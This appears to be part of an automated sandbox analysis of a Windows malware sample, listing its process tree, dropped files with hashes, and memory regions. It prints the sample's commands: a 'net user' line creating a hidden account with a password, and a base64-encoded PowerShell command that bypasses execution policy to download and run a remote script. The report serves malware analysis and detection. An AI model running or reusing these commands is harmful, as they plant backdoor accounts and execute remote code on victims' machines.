C:\Windows\system32\net.exenet.exe user WgaUtilAcc Fu0qrwun2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Fu0qrwun3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.dllMD5
c05933f0e6f6642d5d647049e752305a
SHA1f71b5afc397a52b12d4a3400724ccc16254ab6b4
SHA256fc0e02bd55dbd993a7217e4157e30896bc8b0383fbb0e425943145ea92804ad4
SHA51297b6352b5cb5ea961c337e1629c4270ae95cbff0eb49326de2afca6dff5e8850c179becda1893b9674b16794d2299ebbcb08cff9c2f71a170d428054860e40b6
-
C:\Users\Admin\AppData\Local\Temp\6EC3.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\6EC3.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES86D0.tmpMD5
7b080a692dcbff151f2c4dd2556cfd7e
SHA171588a2e4d0c1852e6c8b2eae28a729ccc5c418e
SHA256931078cc11e3dd4651909ed293e2c8ebf01ddc3e651b4ebd65263a0274042e7f
SHA512929673007f5fbd3e08b46ea0c0012a7288e24e4ebe04456b8847f87543537372fbdcb507a43023488a5ceb7ecb83ea905fca28b87cd93f4342eba6c4baa925e8
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.cmdlineMD5
12ebeafbd27ff16af1c73abdc33a5dbf
SHA176f2ba1bd5ce9e2630b006c0630882e24a573a2c
SHA256f08243481e7712c4738e4a9aa6c27ddfe2b6a4e6af32d881312364094bc7ed15
SHA5124b6d6b7d6f74d70f48607e42a851691a1a404252cb399a2868f2f3416474d43c8b28cc721212eb469fa1a4b5e01b93787eb5c63fbb2640388d138a909283ebd6
-
\??\c:\Users\Admin\AppData\Local\Temp\2bp10wzj\CSC20A7C651A2C142128975A83FC589745C.TMPMD5
5554a7162d415b08511d40062476127d
SHA1c45c664e6c6bc8e21cbf7e97150d8f274027a2e1
SHA2565e4df79a3ce198ee96cf241615ad09adf55b318313a42dd58b0374096fd31273
SHA51297e7aa9bb8383a73399bb581b236fc4c1daea25b9ab8ed16e2cd2e6940ad5aa01937ec7619aa663023582a4bff94de44a11899c7e192d0f3456afbc6dc30cb6d
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/708-123-0x000001BEED520000-0x000001BEED522000-memory.dmpFilesize
8KB
-
memory/708-127-0x000001BEED526000-0x000001BEED527000-memory.dmpFilesize
4KB
-
memory/708-119-0x0000000000000000-mapping.dmp
-
memory/708-122-0x000001BEEE240000-0x000001BEEE63F000-memory.dmpFilesize
4.0MB
-
memory/708-126-0x000001BEED525000-0x000001BEED526000-memory.dmpFilesize
4KB
-
memory/708-125-0x000001BEED523000-0x000001BEED525000-memory.dmpFilesize
8KB
-
memory/1144-366-0x0000000000000000-mapping.dmp
-
memory/1360-363-0x0000000000000000-mapping.dmp
-
memory/1444-368-0x0000000000000000-mapping.dmp
-
memory/1448-369-0x0000000000000000-mapping.dmp
-
memory/1576-169-0x0000000000000000-mapping.dmp
-
memory/1576-170-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-180-0x00000292D3883000-0x00000292D3885000-memory.dmpFilesize
8KB
-
memory/1576-172-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-181-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-203-0x00000292D3886000-0x00000292D3888000-memory.dmpFilesize
8KB
-
memory/1576-171-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-173-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-179-0x00000292D3880000-0x00000292D3882000-memory.dmpFilesize
8KB
-
memory/1576-175-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-176-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1576-177-0x00000292B9780000-0x00000292B9782000-memory.dmpFilesize
8KB
-
memory/1656-288-0x0000023DF6AB0000-0x0000023DF6AB2000-memory.dmpFilesize
8KB
-
memory/1656-299-0x0000023DF6AB8000-0x0000023DF6ABA000-memory.dmpFilesize
8KB
-
memory/1656-289-0x0000023DF6AB3000-0x0000023DF6AB5000-memory.dmpFilesize
8KB
-
memory/1656-290-0x0000023DF6AB6000-0x0000023DF6AB8000-memory.dmpFilesize
8KB
-
memory/1656-251-0x0000000000000000-mapping.dmp
-
memory/1868-352-0x0000000000000000-mapping.dmp
-
memory/1892-373-0x0000000000000000-mapping.dmp
-
memory/1936-349-0x0000000000000000-mapping.dmp
-
memory/2324-355-0x0000000000000000-mapping.dmp
-
memory/2336-375-0x0000000000000000-mapping.dmp
-
memory/2380-358-0x0000000000000000-mapping.dmp
-
memory/2392-149-0x0000000000000000-mapping.dmp
-
memory/2392-364-0x0000000000000000-mapping.dmp
-
memory/2760-371-0x0000000000000000-mapping.dmp
-
memory/2880-444-0x0000000000000000-mapping.dmp
-
memory/2948-361-0x0000000000000000-mapping.dmp
-
memory/3024-139-0x0000022B46C13000-0x0000022B46C15000-memory.dmpFilesize
8KB
-
memory/3024-129-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-162-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-161-0x0000022B606E0000-0x0000022B606E1000-memory.dmpFilesize
4KB
-
memory/3024-138-0x0000022B5FDE0000-0x0000022B5FDE1000-memory.dmpFilesize
4KB
-
memory/3024-128-0x0000000000000000-mapping.dmp
-
memory/3024-163-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-130-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-160-0x0000022B60350000-0x0000022B60351000-memory.dmpFilesize
4KB
-
memory/3024-159-0x0000022B46C18000-0x0000022B46C19000-memory.dmpFilesize
4KB
-
memory/3024-153-0x0000022B47110000-0x0000022B47111000-memory.dmpFilesize
4KB
-
memory/3024-137-0x0000022B46C10000-0x0000022B46C12000-memory.dmpFilesize
8KB
-
memory/3024-148-0x0000022B46C16000-0x0000022B46C18000-memory.dmpFilesize
8KB
-
memory/3024-131-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-132-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-133-0x0000022B46C60000-0x0000022B46C61000-memory.dmpFilesize
4KB
-
memory/3024-134-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-135-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-141-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3024-136-0x0000022B45330000-0x0000022B45332000-memory.dmpFilesize
8KB
-
memory/3036-118-0x0000000000590000-0x00000000005A6000-memory.dmpFilesize
88KB
-
memory/3052-370-0x0000000000000000-mapping.dmp
-
memory/3060-310-0x0000000000000000-mapping.dmp
-
memory/3088-357-0x0000000000000000-mapping.dmp
-
memory/3144-374-0x0000000000000000-mapping.dmp
-
memory/3164-348-0x0000000000000000-mapping.dmp
-
memory/3312-145-0x0000000000000000-mapping.dmp
-
memory/3492-354-0x0000000000000000-mapping.dmp
-
memory/3500-445-0x0000000000000000-mapping.dmp
-
memory/3708-365-0x0000000000000000-mapping.dmp
-
memory/3748-406-0x000001CC62DA8000-0x000001CC62DA9000-memory.dmpFilesize
4KB
-
memory/3748-392-0x000001CC62DA6000-0x000001CC62DA8000-memory.dmpFilesize
8KB
-
memory/3748-387-0x000001CC62DA3000-0x000001CC62DA5000-memory.dmpFilesize
8KB
-
memory/3748-386-0x000001CC62DA0000-0x000001CC62DA2000-memory.dmpFilesize
8KB
-
memory/3748-376-0x0000000000000000-mapping.dmp
-
memory/3780-311-0x0000000000000000-mapping.dmp
-
memory/3844-116-0x0000000002FF0000-0x0000000002FF9000-memory.dmpFilesize
36KB
-
memory/3844-115-0x0000000002FE0000-0x0000000002FE8000-memory.dmpFilesize
32KB
-
memory/3844-356-0x0000000000000000-mapping.dmp
-
memory/3844-117-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/3884-353-0x0000000000000000-mapping.dmp
-
memory/3988-246-0x0000016DD3466000-0x0000016DD3468000-memory.dmpFilesize
8KB
-
memory/3988-209-0x0000000000000000-mapping.dmp
-
memory/3988-244-0x0000016DD3460000-0x0000016DD3462000-memory.dmpFilesize
8KB
-
memory/3988-245-0x0000016DD3463000-0x0000016DD3465000-memory.dmpFilesize
8KB
-
memory/3988-287-0x0000016DD3468000-0x0000016DD346A000-memory.dmpFilesize
8KB
-
memory/3992-372-0x0000000000000000-mapping.dmp
-
memory/3996-362-0x0000000000000000-mapping.dmp
-
memory/4056-309-0x0000000000000000-mapping.dmp
-
memory/4084-367-0x0000000000000000-mapping.dmp